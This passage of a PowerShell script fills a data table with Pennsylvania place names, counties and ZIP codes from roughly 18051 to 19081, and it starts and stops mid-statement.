$Cities.Rows.Add("Fogelsville","Lehigh","Pennsylvania","PA","42","18051") + $null = $Cities.Rows.Add("Hokendauqua","Lehigh","Pennsylvania","PA","42","18052") + $null = $Cities.Rows.Add("Germansville","Lehigh","Pennsylvania","PA","42","18053") + $null = $Cities.Rows.Add("Green lane","Montgomery","Pennsylvania","PA","42","18054") + $null = $Cities.Rows.Add("Hellertown","Northampton","Pennsylvania","PA","42","18055") + $null = $Cities.Rows.Add("Hereford","Berks","Pennsylvania","PA","42","18056") + $null = $Cities.Rows.Add("Kunkletown","Monroe","Pennsylvania","PA","42","18058") + $null = $Cities.Rows.Add("Laurys station","Lehigh","Pennsylvania","PA","42","18059") + $null = $Cities.Rows.Add("Macungie","Lehigh","Pennsylvania","PA","42","18062") + $null = $Cities.Rows.Add("Martins creek","Northampton","Pennsylvania","PA","42","18063") + $null = $Cities.Rows.Add("Nazareth","Northampton","Pennsylvania","PA","42","18064") + $null = $Cities.Rows.Add("New tripoli","Lehigh","Pennsylvania","PA","42","18066") + $null = $Cities.Rows.Add("Northampton","Northampton","Pennsylvania","PA","42","18067") + $null = $Cities.Rows.Add("Orefield","Lehigh","Pennsylvania","PA","42","18069") + $null = $Cities.Rows.Add("Palm","Montgomery","Pennsylvania","PA","42","18070") + $null = $Cities.Rows.Add("Palmerton","Carbon","Pennsylvania","PA","42","18071") + $null = $Cities.Rows.Add("Pen argyl","Northampton","Pennsylvania","PA","42","18072") + $null = $Cities.Rows.Add("Pennsburg","Montgomery","Pennsylvania","PA","42","18073") + $null = $Cities.Rows.Add("Perkiomenville","Montgomery","Pennsylvania","PA","42","18074") + $null = $Cities.Rows.Add("Red hill","Montgomery","Pennsylvania","PA","42","18076") + $null = $Cities.Rows.Add("Riegelsville","Bucks","Pennsylvania","PA","42","18077") + $null = $Cities.Rows.Add("Schnecksville","Lehigh","Pennsylvania","PA","42","18078") + $null = $Cities.Rows.Add("Slatedale","Lehigh","Pennsylvania","PA","42","18079") + $null = $Cities.Rows.Add("Emerald","Lehigh","Pennsylvania","PA","42","18080") + $null = $Cities.Rows.Add("Springtown","Bucks","Pennsylvania","PA","42","18081") + $null = $Cities.Rows.Add("Stockertown","Northampton","Pennsylvania","PA","42","18083") + $null = $Cities.Rows.Add("Tatamy","Northampton","Pennsylvania","PA","42","18085") + $null = $Cities.Rows.Add("Treichlers","Northampton","Pennsylvania","PA","42","18086") + $null = $Cities.Rows.Add("Trexlertown","Lehigh","Pennsylvania","PA","42","18087") + $null = $Cities.Rows.Add("Walnutport","Northampton","Pennsylvania","PA","42","18088") + $null = $Cities.Rows.Add("Wind gap","Northampton","Pennsylvania","PA","42","18091") + $null = $Cities.Rows.Add("Zionsville","Lehigh","Pennsylvania","PA","42","18092") + $null = $Cities.Rows.Add("Zcta 180hh","Bucks","Pennsylvania","PA","42","180HH") + $null = $Cities.Rows.Add("Allentown","Lehigh","Pennsylvania","PA","42","18101") + $null = $Cities.Rows.Add("Allentown","Lehigh","Pennsylvania","PA","42","18102") + $null = $Cities.Rows.Add("Allentown","Lehigh","Pennsylvania","PA","42","18103") + $null = $Cities.Rows.Add("Allentown","Lehigh","Pennsylvania","PA","42","18104") + $null = $Cities.Rows.Add("Wescosville","Lehigh","Pennsylvania","PA","42","18106") + $null = $Cities.Rows.Add("Zcta 181hh","Lehigh","Pennsylvania","PA","42","181HH") + $null = $Cities.Rows.Add("West hazleton","Luzerne","Pennsylvania","PA","42","18201") + $null = $Cities.Rows.Add("Albrightsville","Carbon","Pennsylvania","PA","42","18210") + $null = $Cities.Rows.Add("Andreas","Schuylkill","Pennsylvania","PA","42","18211") + $null = $Cities.Rows.Add("Barnesville","Schuylkill","Pennsylvania","PA","42","18214") + $null = $Cities.Rows.Add("Beaver meadows","Carbon","Pennsylvania","PA","42","18216") + $null = $Cities.Rows.Add("Coaldale","Schuylkill","Pennsylvania","PA","42","18218") + $null = $Cities.Rows.Add("Conyngham","Luzerne","Pennsylvania","PA","42","18219") + $null = $Cities.Rows.Add("Delano","Schuylkill","Pennsylvania","PA","42","18220") + $null = $Cities.Rows.Add("Drifton","Luzerne","Pennsylvania","PA","42","18221") + $null = $Cities.Rows.Add("Drums","Luzerne","Pennsylvania","PA","42","18222") + $null = $Cities.Rows.Add("Freeland","Luzerne","Pennsylvania","PA","42","18224") + $null = $Cities.Rows.Add("Harleigh","Luzerne","Pennsylvania","PA","42","18225") + $null = $Cities.Rows.Add("Jim thorpe","Carbon","Pennsylvania","PA","42","18229") + $null = $Cities.Rows.Add("Junedale","Carbon","Pennsylvania","PA","42","18230") + $null = $Cities.Rows.Add("Kelayres","Schuylkill","Pennsylvania","PA","42","18231") + $null = $Cities.Rows.Add("Lansford","Carbon","Pennsylvania","PA","42","18232") + $null = $Cities.Rows.Add("Lattimer mines","Luzerne","Pennsylvania","PA","42","18234") + $null = $Cities.Rows.Add("Weissport","Carbon","Pennsylvania","PA","42","18235") + $null = $Cities.Rows.Add("Mcadoo","Schuylkill","Pennsylvania","PA","42","18237") + $null = $Cities.Rows.Add("Milnesville","Luzerne","Pennsylvania","PA","42","18239") + $null = $Cities.Rows.Add("Nesquehoning","Carbon","Pennsylvania","PA","42","18240") + $null = $Cities.Rows.Add("Fern glen","Schuylkill","Pennsylvania","PA","42","18241") + $null = $Cities.Rows.Add("Oneida","Schuylkill","Pennsylvania","PA","42","18242") + $null = $Cities.Rows.Add("Parryville","Carbon","Pennsylvania","PA","42","18244") + $null = $Cities.Rows.Add("Quakake","Schuylkill","Pennsylvania","PA","42","18245") + $null = $Cities.Rows.Add("Rock glen","Luzerne","Pennsylvania","PA","42","18246") + $null = $Cities.Rows.Add("Sheppton","Schuylkill","Pennsylvania","PA","42","18248") + $null = $Cities.Rows.Add("Sugarloaf","Luzerne","Pennsylvania","PA","42","18249") + $null = $Cities.Rows.Add("Summit hill","Carbon","Pennsylvania","PA","42","18250") + $null = $Cities.Rows.Add("Sybertsville","Luzerne","Pennsylvania","PA","42","18251") + $null = $Cities.Rows.Add("Tamaqua","Schuylkill","Pennsylvania","PA","42","18252") + $null = $Cities.Rows.Add("Tresckow","Carbon","Pennsylvania","PA","42","18254") + $null = $Cities.Rows.Add("Weatherly","Carbon","Pennsylvania","PA","42","18255") + $null = $Cities.Rows.Add("Weston","Luzerne","Pennsylvania","PA","42","18256") + $null = $Cities.Rows.Add("Zcta 182hh","Carbon","Pennsylvania","PA","42","182HH") + $null = $Cities.Rows.Add("East stroudsburg","Monroe","Pennsylvania","PA","42","18301") + $null = $Cities.Rows.Add("Bartonsville","Monroe","Pennsylvania","PA","42","18321") + $null = $Cities.Rows.Add("Brodheadsville","Monroe","Pennsylvania","PA","42","18322") + $null = $Cities.Rows.Add("Buck hill falls","Monroe","Pennsylvania","PA","42","18323") + $null = $Cities.Rows.Add("Bushkill","Pike","Pennsylvania","PA","42","18324") + $null = $Cities.Rows.Add("Canadensis","Monroe","Pennsylvania","PA","42","18325") + $null = $Cities.Rows.Add("Cresco","Monroe","Pennsylvania","PA","42","18326") + $null = $Cities.Rows.Add("Delaware water g","Monroe","Pennsylvania","PA","42","18327") + $null = $Cities.Rows.Add("Dingmans ferry","Pike","Pennsylvania","PA","42","18328") + $null = $Cities.Rows.Add("Effort","Monroe","Pennsylvania","PA","42","18330") + $null = $Cities.Rows.Add("Gilbert","Monroe","Pennsylvania","PA","42","18331") + $null = $Cities.Rows.Add("Henryville","Monroe","Pennsylvania","PA","42","18332") + $null = $Cities.Rows.Add("Kresgeville","Monroe","Pennsylvania","PA","42","18333") + $null = $Cities.Rows.Add("Long pond","Monroe","Pennsylvania","PA","42","18334") + $null = $Cities.Rows.Add("Matamoras","Pike","Pennsylvania","PA","42","18336") + $null = $Cities.Rows.Add("Milford","Pike","Pennsylvania","PA","42","18337") + $null = $Cities.Rows.Add("Millrift","Pike","Pennsylvania","PA","42","18340") + $null = $Cities.Rows.Add("Minisink hills","Monroe","Pennsylvania","PA","42","18341") + $null = $Cities.Rows.Add("Mount bethel","Northampton","Pennsylvania","PA","42","18343") + $null = $Cities.Rows.Add("Mount pocono","Monroe","Pennsylvania","PA","42","18344") + $null = $Cities.Rows.Add("Pocono summit","Monroe","Pennsylvania","PA","42","18346") + $null = $Cities.Rows.Add("Pocono lake","Monroe","Pennsylvania","PA","42","18347") + $null = $Cities.Rows.Add("Pocono manor","Monroe","Pennsylvania","PA","42","18349") + $null = $Cities.Rows.Add("Pocono pines","Monroe","Pennsylvania","PA","42","18350") + $null = $Cities.Rows.Add("Portland","Northampton","Pennsylvania","PA","42","18351") + $null = $Cities.Rows.Add("Saylorsburg","Monroe","Pennsylvania","PA","42","18353") + $null = $Cities.Rows.Add("Sciota","Monroe","Pennsylvania","PA","42","18354") + $null = $Cities.Rows.Add("Scotrun","Monroe","Pennsylvania","PA","42","18355") + $null = $Cities.Rows.Add("Shawnee on delaw","Monroe","Pennsylvania","PA","42","18356") + $null = $Cities.Rows.Add("Skytop","Monroe","Pennsylvania","PA","42","18357") + $null = $Cities.Rows.Add("Stroudsburg","Monroe","Pennsylvania","PA","42","18360") + $null = $Cities.Rows.Add("Swiftwater","Monroe","Pennsylvania","PA","42","18370") + $null = $Cities.Rows.Add("Tannersville","Monroe","Pennsylvania","PA","42","18372") + $null = $Cities.Rows.Add("Zcta 183hh","Monroe","Pennsylvania","PA","42","183HH") + $null = $Cities.Rows.Add("Eynon","Lackawanna","Pennsylvania","PA","42","18403") + $null = $Cities.Rows.Add("Beach lake","Wayne","Pennsylvania","PA","42","18405") + $null = $Cities.Rows.Add("Simpson","Lackawanna","Pennsylvania","PA","42","18407") + $null = $Cities.Rows.Add("Clarks summit","Lackawanna","Pennsylvania","PA","42","18411") + $null = $Cities.Rows.Add("Clifford","Susquehanna","Pennsylvania","PA","42","18413") + $null = $Cities.Rows.Add("Dalton","Lackawanna","Pennsylvania","PA","42","18414") + $null = $Cities.Rows.Add("Damascus","Wayne","Pennsylvania","PA","42","18415") + $null = $Cities.Rows.Add("Equinunk","Wayne","Pennsylvania","PA","42","18417") + $null = $Cities.Rows.Add("Factoryville","Wyoming","Pennsylvania","PA","42","18419") + $null = $Cities.Rows.Add("Fleetville","Lackawanna","Pennsylvania","PA","42","18420") + $null = $Cities.Rows.Add("Browndale","Susquehanna","Pennsylvania","PA","42","18421") + $null = $Cities.Rows.Add("Gouldsboro","Lackawanna","Pennsylvania","PA","42","18424") + $null = $Cities.Rows.Add("Greeley","Pike","Pennsylvania","PA","42","18425") + $null = $Cities.Rows.Add("Greentown","Pike","Pennsylvania","PA","42","18426") + $null = $Cities.Rows.Add("Hawley","Pike","Pennsylvania","PA","42","18428") + $null = $Cities.Rows.Add("Herrick center","Susquehanna","Pennsylvania","PA","42","18430") + $null = $Cities.Rows.Add("Honesdale","Wayne","Pennsylvania","PA","42","18431") + $null = $Cities.Rows.Add("Mayfield","Lackawanna","Pennsylvania","PA","42","18433") + $null = $Cities.Rows.Add("Jessup","Lackawanna","Pennsylvania","PA","42","18434") + $null = $Cities.Rows.Add("Lackawaxen","Pike","Pennsylvania","PA","42","18435") + $null = $Cities.Rows.Add("Lake ariel","Wayne","Pennsylvania","PA","42","18436") + $null = $Cities.Rows.Add("Lake como","Wayne","Pennsylvania","PA","42","18437") + $null = $Cities.Rows.Add("Lakeville","Wayne","Pennsylvania","PA","42","18438") + $null = $Cities.Rows.Add("Lakewood","Wayne","Pennsylvania","PA","42","18439") + $null = $Cities.Rows.Add("Lenoxville","Susquehanna","Pennsylvania","PA","42","18441") + $null = $Cities.Rows.Add("Milanville","Wayne","Pennsylvania","PA","42","18443") + $null = $Cities.Rows.Add("Moscow","Lackawanna","Pennsylvania","PA","42","18444") + $null = $Cities.Rows.Add("Newfoundland","Wayne","Pennsylvania","PA","42","18445") + $null = $Cities.Rows.Add("Nicholson","Wyoming","Pennsylvania","PA","42","18446") + $null = $Cities.Rows.Add("Olyphant","Lackawanna","Pennsylvania","PA","42","18447") + $null = $Cities.Rows.Add("Paupack","Pike","Pennsylvania","PA","42","18451") + $null = $Cities.Rows.Add("Peckville","Lackawanna","Pennsylvania","PA","42","18452") + $null = $Cities.Rows.Add("Pleasant mount","Wayne","Pennsylvania","PA","42","18453") + $null = $Cities.Rows.Add("Preston park","Wayne","Pennsylvania","PA","42","18455") + $null = $Cities.Rows.Add("Prompton","Wayne","Pennsylvania","PA","42","18456") + $null = $Cities.Rows.Add("Rowland","Pike","Pennsylvania","PA","42","18457") + $null = $Cities.Rows.Add("Shohola","Pike","Pennsylvania","PA","42","18458") + $null = $Cities.Rows.Add("South canaan","Wayne","Pennsylvania","PA","42","18459") + $null = $Cities.Rows.Add("South sterling","Wayne","Pennsylvania","PA","42","18460") + $null = $Cities.Rows.Add("Starlight","Wayne","Pennsylvania","PA","42","18461") + $null = $Cities.Rows.Add("Starrucca","Wayne","Pennsylvania","PA","42","18462") + $null = $Cities.Rows.Add("Tafton","Pike","Pennsylvania","PA","42","18464") + $null = $Cities.Rows.Add("Thompson","Susquehanna","Pennsylvania","PA","42","18465") + $null = $Cities.Rows.Add("Tobyhanna","Monroe","Pennsylvania","PA","42","18466") + $null = $Cities.Rows.Add("Tyler hill","Wayne","Pennsylvania","PA","42","18469") + $null = $Cities.Rows.Add("Union dale","Susquehanna","Pennsylvania","PA","42","18470") + $null = $Cities.Rows.Add("Waverly","Lackawanna","Pennsylvania","PA","42","18471") + $null = $Cities.Rows.Add("Waymart","Wayne","Pennsylvania","PA","42","18472") + $null = $Cities.Rows.Add("White mills","Wayne","Pennsylvania","PA","42","18473") + $null = $Cities.Rows.Add("Zcta 184hh","Lackawanna","Pennsylvania","PA","42","184HH") + $null = $Cities.Rows.Add("Zcta 184xx","Monroe","Pennsylvania","PA","42","184XX") + $null = $Cities.Rows.Add("Scranton","Lackawanna","Pennsylvania","PA","42","18503") + $null = $Cities.Rows.Add("Scranton","Lackawanna","Pennsylvania","PA","42","18504") + $null = $Cities.Rows.Add("Scranton","Lackawanna","Pennsylvania","PA","42","18505") + $null = $Cities.Rows.Add("Moosic","Lackawanna","Pennsylvania","PA","42","18507") + $null = $Cities.Rows.Add("Scranton","Lackawanna","Pennsylvania","PA","42","18508") + $null = $Cities.Rows.Add("Scranton","Lackawanna","Pennsylvania","PA","42","18509") + $null = $Cities.Rows.Add("Scranton","Lackawanna","Pennsylvania","PA","42","18510") + $null = $Cities.Rows.Add("Dunmore","Lackawanna","Pennsylvania","PA","42","18512") + $null = $Cities.Rows.Add("Taylor","Lackawanna","Pennsylvania","PA","42","18517") + $null = $Cities.Rows.Add("Old forge","Lackawanna","Pennsylvania","PA","42","18518") + $null = $Cities.Rows.Add("Dickson city","Lackawanna","Pennsylvania","PA","42","18519") + $null = $Cities.Rows.Add("Beach haven","Luzerne","Pennsylvania","PA","42","18601") + $null = $Cities.Rows.Add("Bear creek","Luzerne","Pennsylvania","PA","42","18602") + $null = $Cities.Rows.Add("Berwick","Columbia","Pennsylvania","PA","42","18603") + $null = $Cities.Rows.Add("Blakeslee","Monroe","Pennsylvania","PA","42","18610") + $null = $Cities.Rows.Add("Cambra","Luzerne","Pennsylvania","PA","42","18611") + $null = $Cities.Rows.Add("College miserico","Luzerne","Pennsylvania","PA","42","18612") + $null = $Cities.Rows.Add("Dushore","Sullivan","Pennsylvania","PA","42","18614") + $null = $Cities.Rows.Add("Falls","Wyoming","Pennsylvania","PA","42","18615") + $null = $Cities.Rows.Add("Forksville","Sullivan","Pennsylvania","PA","42","18616") + $null = $Cities.Rows.Add("Glen lyon","Luzerne","Pennsylvania","PA","42","18617") + $null = $Cities.Rows.Add("Harveys lake","Luzerne","Pennsylvania","PA","42","18618") + $null = $Cities.Rows.Add("Hillsgrove","Sullivan","Pennsylvania","PA","42","18619") + $null = $Cities.Rows.Add("Hunlock creek","Luzerne","Pennsylvania","PA","42","18621") + $null = $Cities.Rows.Add("Huntington mills","Luzerne","Pennsylvania","PA","42","18622") + $null = $Cities.Rows.Add("Laceyville","Wyoming","Pennsylvania","PA","42","18623") + $null = $Cities.Rows.Add("Lake harmony","Carbon","Pennsylvania","PA","42","18624") + $null = $Cities.Rows.Add("Lake winola","Wyoming","Pennsylvania","PA","42","18625") + $null = $Cities.Rows.Add("Laporte","Sullivan","Pennsylvania","PA","42","18626") + $null = $Cities.Rows.Add("Lopez","Sullivan","Pennsylvania","PA","42","18628") + $null = $Cities.Rows.Add("Mehoopany","Wyoming","Pennsylvania","PA","42","18629") + $null = $Cities.Rows.Add("Meshoppen","Susquehanna","Pennsylvania","PA","42","18630") + $null = $Cities.Rows.Add("Mifflinville","Columbia","Pennsylvania","PA","42","18631") + $null = $Cities.Rows.Add("Mildred","Sullivan","Pennsylvania","PA","42","18632") + $null = $Cities.Rows.Add("Nanticoke","Luzerne","Pennsylvania","PA","42","18634") + $null = $Cities.Rows.Add("Nescopeck","Luzerne","Pennsylvania","PA","42","18635") + $null = $Cities.Rows.Add("Noxen","Wyoming","Pennsylvania","PA","42","18636") + $null = $Cities.Rows.Add("Pittston","Luzerne","Pennsylvania","PA","42","18640") + $null = $Cities.Rows.Add("Avoca","Luzerne","Pennsylvania","PA","42","18641") + $null = $Cities.Rows.Add("Duryea","Luzerne","Pennsylvania","PA","42","18642") + $null = $Cities.Rows.Add("West pittston","Luzerne","Pennsylvania","PA","42","18643") + $null = $Cities.Rows.Add("Wyoming","Luzerne","Pennsylvania","PA","42","18644") + $null = $Cities.Rows.Add("Plymouth","Luzerne","Pennsylvania","PA","42","18651") + $null = $Cities.Rows.Add("Ransom","Lackawanna","Pennsylvania","PA","42","18653") + $null = $Cities.Rows.Add("Mocanaqua","Luzerne","Pennsylvania","PA","42","18655") + $null = $Cities.Rows.Add("Sweet valley","Luzerne","Pennsylvania","PA","42","18656") + $null = $Cities.Rows.Add("Center moreland","Wyoming","Pennsylvania","PA","42","18657") + $null = $Cities.Rows.Add("Wapwallopen","Luzerne","Pennsylvania","PA","42","18660") + $null = $Cities.Rows.Add("White haven","Luzerne","Pennsylvania","PA","42","18661") + $null = $Cities.Rows.Add("Zcta 186hh","Bradford","Pennsylvania","PA","42","186HH") + $null = $Cities.Rows.Add("Zcta 186xx","Luzerne","Pennsylvania","PA","42","186XX") + $null = $Cities.Rows.Add("Wilkes barre","Luzerne","Pennsylvania","PA","42","18701") + $null = $Cities.Rows.Add("Hanover township","Luzerne","Pennsylvania","PA","42","18702") + $null = $Cities.Rows.Add("Kingston","Luzerne","Pennsylvania","PA","42","18704") + $null = $Cities.Rows.Add("Wilkes barre","Luzerne","Pennsylvania","PA","42","18705") + $null = $Cities.Rows.Add("Ashley","Luzerne","Pennsylvania","PA","42","18706") + $null = $Cities.Rows.Add("Mountain top","Luzerne","Pennsylvania","PA","42","18707") + $null = $Cities.Rows.Add("Shavertown","Luzerne","Pennsylvania","PA","42","18708") + $null = $Cities.Rows.Add("Luzerne","Luzerne","Pennsylvania","PA","42","18709") + $null = $Cities.Rows.Add("Montrose","Susquehanna","Pennsylvania","PA","42","18801") + $null = $Cities.Rows.Add("Athens","Bradford","Pennsylvania","PA","42","18810") + $null = $Cities.Rows.Add("Brackney","Susquehanna","Pennsylvania","PA","42","18812") + $null = $Cities.Rows.Add("Brooklyn","Susquehanna","Pennsylvania","PA","42","18813") + $null = $Cities.Rows.Add("Burlington","Bradford","Pennsylvania","PA","42","18814") + $null = $Cities.Rows.Add("Dimock","Susquehanna","Pennsylvania","PA","42","18816") + $null = $Cities.Rows.Add("East smithfield","Bradford","Pennsylvania","PA","42","18817") + $null = $Cities.Rows.Add("Friendsville","Susquehanna","Pennsylvania","PA","42","18818") + $null = $Cities.Rows.Add("Gibson","Susquehanna","Pennsylvania","PA","42","18820") + $null = $Cities.Rows.Add("Great bend","Susquehanna","Pennsylvania","PA","42","18821") + $null = $Cities.Rows.Add("Hallstead","Susquehanna","Pennsylvania","PA","42","18822") + $null = $Cities.Rows.Add("Harford","Susquehanna","Pennsylvania","PA","42","18823") + $null = $Cities.Rows.Add("Hop bottom","Susquehanna","Pennsylvania","PA","42","18824") + $null = $Cities.Rows.Add("Jackson","Susquehanna","Pennsylvania","PA","42","18825") + $null = $Cities.Rows.Add("Kingsley","Susquehanna","Pennsylvania","PA","42","18826") + $null = $Cities.Rows.Add("Lanesboro","Susquehanna","Pennsylvania","PA","42","18827") + $null = $Cities.Rows.Add("Lawton","Susquehanna","Pennsylvania","PA","42","18828") + $null = $Cities.Rows.Add("Le raysville","Bradford","Pennsylvania","PA","42","18829") + $null = $Cities.Rows.Add("Little meadows","Susquehanna","Pennsylvania","PA","42","18830") + $null = $Cities.Rows.Add("Milan","Bradford","Pennsylvania","PA","42","18831") + $null = $Cities.Rows.Add("Monroeton","Bradford","Pennsylvania","PA","42","18832") + $null = $Cities.Rows.Add("New albany","Bradford","Pennsylvania","PA","42","18833") + $null = $Cities.Rows.Add("New milford","Susquehanna","Pennsylvania","PA","42","18834") + $null = $Cities.Rows.Add("Rome","Bradford","Pennsylvania","PA","42","18837") + $null = $Cities.Rows.Add("Rushville","Susquehanna","Pennsylvania","PA","42","18839") + $null = $Cities.Rows.Add("Sayre","Bradford","Pennsylvania","PA","42","18840") + $null = $Cities.Rows.Add("South gibson","Susquehanna","Pennsylvania","PA","42","18842") + $null = $Cities.Rows.Add("Springville","Susquehanna","Pennsylvania","PA","42","18844") + $null = $Cities.Rows.Add("Stevensville","Bradford","Pennsylvania","PA","42","18845") + $null = $Cities.Rows.Add("Sugar run","Bradford","Pennsylvania","PA","42","18846") + $null = $Cities.Rows.Add("Susquehanna","Susquehanna","Pennsylvania","PA","42","18847") + $null = $Cities.Rows.Add("Towanda","Bradford","Pennsylvania","PA","42","18848") + $null = $Cities.Rows.Add("Ulster","Bradford","Pennsylvania","PA","42","18850") + $null = $Cities.Rows.Add("Warren center","Bradford","Pennsylvania","PA","42","18851") + $null = $Cities.Rows.Add("Wyalusing","Bradford","Pennsylvania","PA","42","18853") + $null = $Cities.Rows.Add("Wysox","Bradford","Pennsylvania","PA","42","18854") + $null = $Cities.Rows.Add("Zcta 188hh","Bradford","Pennsylvania","PA","42","188HH") + $null = $Cities.Rows.Add("New britain","Bucks","Pennsylvania","PA","42","18901") + $null = $Cities.Rows.Add("Chalfont","Bucks","Pennsylvania","PA","42","18914") + $null = $Cities.Rows.Add("Colmar","Montgomery","Pennsylvania","PA","42","18915") + $null = $Cities.Rows.Add("Dublin","Bucks","Pennsylvania","PA","42","18917") + $null = $Cities.Rows.Add("Erwinna","Bucks","Pennsylvania","PA","42","18920") + $null = $Cities.Rows.Add("Fountainville","Bucks","Pennsylvania","PA","42","18923") + $null = $Cities.Rows.Add("Furlong","Bucks","Pennsylvania","PA","42","18925") + $null = $Cities.Rows.Add("Hilltown","Bucks","Pennsylvania","PA","42","18927") + $null = $Cities.Rows.Add("Jamison","Bucks","Pennsylvania","PA","42","18929") + $null = $Cities.Rows.Add("Kintnersville","Bucks","Pennsylvania","PA","42","18930") + $null = $Cities.Rows.Add("Line lexington","Bucks","Pennsylvania","PA","42","18932") + $null = $Cities.Rows.Add("Montgomeryville","Montgomery","Pennsylvania","PA","42","18936") + $null = $Cities.Rows.Add("New hope","Bucks","Pennsylvania","PA","42","18938") + $null = $Cities.Rows.Add("George school","Bucks","Pennsylvania","PA","42","18940") + $null = $Cities.Rows.Add("Ottsville","Bucks","Pennsylvania","PA","42","18942") + $null = $Cities.Rows.Add("Perkasie","Bucks","Pennsylvania","PA","42","18944") + $null = $Cities.Rows.Add("Pipersville","Bucks","Pennsylvania","PA","42","18947") + $null = $Cities.Rows.Add("Quakertown","Bucks","Pennsylvania","PA","42","18951") + $null = $Cities.Rows.Add("Richboro","Bucks","Pennsylvania","PA","42","18954") + $null = $Cities.Rows.Add("Richlandtown","Bucks","Pennsylvania","PA","42","18955") + $null = $Cities.Rows.Add("Sellersville","Bucks","Pennsylvania","PA","42","18960") + $null = $Cities.Rows.Add("Silverdale","Bucks","Pennsylvania","PA","42","18962") + $null = $Cities.Rows.Add("Bethton","Montgomery","Pennsylvania","PA","42","18964") + $null = $Cities.Rows.Add("Holland","Bucks","Pennsylvania","PA","42","18966") + $null = $Cities.Rows.Add("Telford","Montgomery","Pennsylvania","PA","42","18969") + $null = $Cities.Rows.Add("Trumbauersville","Bucks","Pennsylvania","PA","42","18970") + $null = $Cities.Rows.Add("Upper black eddy","Bucks","Pennsylvania","PA","42","18972") + $null = $Cities.Rows.Add("Warminster","Bucks","Pennsylvania","PA","42","18974") + $null = $Cities.Rows.Add("Warrington","Bucks","Pennsylvania","PA","42","18976") + $null = $Cities.Rows.Add("Washington cross","Bucks","Pennsylvania","PA","42","18977") + $null = $Cities.Rows.Add("Wycombe","Bucks","Pennsylvania","PA","42","18980") + $null = $Cities.Rows.Add("Zcta 189hh","Bucks","Pennsylvania","PA","42","189HH") + $null = $Cities.Rows.Add("Ogontz campus","Montgomery","Pennsylvania","PA","42","19001") + $null = $Cities.Rows.Add("Maple glen","Montgomery","Pennsylvania","PA","42","19002") + $null = $Cities.Rows.Add("Ardmore","Montgomery","Pennsylvania","PA","42","19003") + $null = $Cities.Rows.Add("Bala cynwyd","Montgomery","Pennsylvania","PA","42","19004") + $null = $Cities.Rows.Add("Huntingdon valle","Montgomery","Pennsylvania","PA","42","19006") + $null = $Cities.Rows.Add("Tullytown","Bucks","Pennsylvania","PA","42","19007") + $null = $Cities.Rows.Add("Broomall","Delaware","Pennsylvania","PA","42","19008") + $null = $Cities.Rows.Add("Bryn athyn","Montgomery","Pennsylvania","PA","42","19009") + $null = $Cities.Rows.Add("Bryn mawr","Delaware","Pennsylvania","PA","42","19010") + $null = $Cities.Rows.Add("Cheltenham","Montgomery","Pennsylvania","PA","42","19012") + $null = $Cities.Rows.Add("Chester","Delaware","Pennsylvania","PA","42","19013") + $null = $Cities.Rows.Add("Aston","Delaware","Pennsylvania","PA","42","19014") + $null = $Cities.Rows.Add("Brookhaven","Delaware","Pennsylvania","PA","42","19015") + $null = $Cities.Rows.Add("Primos secane","Delaware","Pennsylvania","PA","42","19018") + $null = $Cities.Rows.Add("Bensalem","Bucks","Pennsylvania","PA","42","19020") + $null = $Cities.Rows.Add("Croydon","Bucks","Pennsylvania","PA","42","19021") + $null = $Cities.Rows.Add("Crum lynne","Delaware","Pennsylvania","PA","42","19022") + $null = $Cities.Rows.Add("Collingdale","Delaware","Pennsylvania","PA","42","19023") + $null = $Cities.Rows.Add("Dresher","Montgomery","Pennsylvania","PA","42","19025") + $null = $Cities.Rows.Add("Pilgrim gardens","Delaware","Pennsylvania","PA","42","19026") + $null = $Cities.Rows.Add("Zcta 19027","Montgomery","Pennsylvania","PA","42","19027") + $null = $Cities.Rows.Add("Lester","Delaware","Pennsylvania","PA","42","19029") + $null = $Cities.Rows.Add("Fairless hills","Bucks","Pennsylvania","PA","42","19030") + $null = $Cities.Rows.Add("Flourtown","Montgomery","Pennsylvania","PA","42","19031") + $null = $Cities.Rows.Add("Folcroft","Delaware","Pennsylvania","PA","42","19032") + $null = $Cities.Rows.Add("Folsom","Delaware","Pennsylvania","PA","42","19033") + $null = $Cities.Rows.Add("Fort washington","Montgomery","Pennsylvania","PA","42","19034") + $null = $Cities.Rows.Add("Gladwyne","Montgomery","Pennsylvania","PA","42","19035") + $null = $Cities.Rows.Add("Glenolden","Delaware","Pennsylvania","PA","42","19036") + $null = $Cities.Rows.Add("Glenside","Montgomery","Pennsylvania","PA","42","19038") + $null = $Cities.Rows.Add("Hatboro","Montgomery","Pennsylvania","PA","42","19040") + $null = $Cities.Rows.Add("Haverford","Montgomery","Pennsylvania","PA","42","19041") + $null = $Cities.Rows.Add("Holmes","Delaware","Pennsylvania","PA","42","19043") + $null = $Cities.Rows.Add("Horsham","Montgomery","Pennsylvania","PA","42","19044") + $null = $Cities.Rows.Add("Meadowbrook","Montgomery","Pennsylvania","PA","42","19046") + $null = $Cities.Rows.Add("Penndel","Bucks","Pennsylvania","PA","42","19047") + $null = $Cities.Rows.Add("Yeadon","Delaware","Pennsylvania","PA","42","19050") + $null = $Cities.Rows.Add("Feasterville tre","Bucks","Pennsylvania","PA","42","19053") + $null = $Cities.Rows.Add("Levittown","Bucks","Pennsylvania","PA","42","19054") + $null = $Cities.Rows.Add("Levittown","Bucks","Pennsylvania","PA","42","19055") + $null = $Cities.Rows.Add("Levittown","Bucks","Pennsylvania","PA","42","19056") + $null = $Cities.Rows.Add("Levittown","Bucks","Pennsylvania","PA","42","19057") + $null = $Cities.Rows.Add("Boothwyn","Delaware","Pennsylvania","PA","42","19061") + $null = $Cities.Rows.Add("Glen riddle lima","Delaware","Pennsylvania","PA","42","19063") + $null = $Cities.Rows.Add("Springfield","Delaware","Pennsylvania","PA","42","19064") + $null = $Cities.Rows.Add("Merion station","Montgomery","Pennsylvania","PA","42","19066") + $null = $Cities.Rows.Add("Yardley","Bucks","Pennsylvania","PA","42","19067") + $null = $Cities.Rows.Add("Morton","Delaware","Pennsylvania","PA","42","19070") + $null = $Cities.Rows.Add("Narberth","Montgomery","Pennsylvania","PA","42","19072") + $null = $Cities.Rows.Add("Newtown square","Delaware","Pennsylvania","PA","42","19073") + $null = $Cities.Rows.Add("Norwood","Delaware","Pennsylvania","PA","42","19074") + $null = $Cities.Rows.Add("Oreland","Montgomery","Pennsylvania","PA","42","19075") + $null = $Cities.Rows.Add("Prospect park","Delaware","Pennsylvania","PA","42","19076") + $null = $Cities.Rows.Add("Ridley park","Delaware","Pennsylvania","PA","42","19078") + $null = $Cities.Rows.Add("Sharon hill","Delaware","Pennsylvania","PA","42","19079") + $null = $Cities.Rows.Add("Swarthmore","Delaware","Pennsylvania","PA","42","19081") + $null = $Cities.Rows.Add("Upper 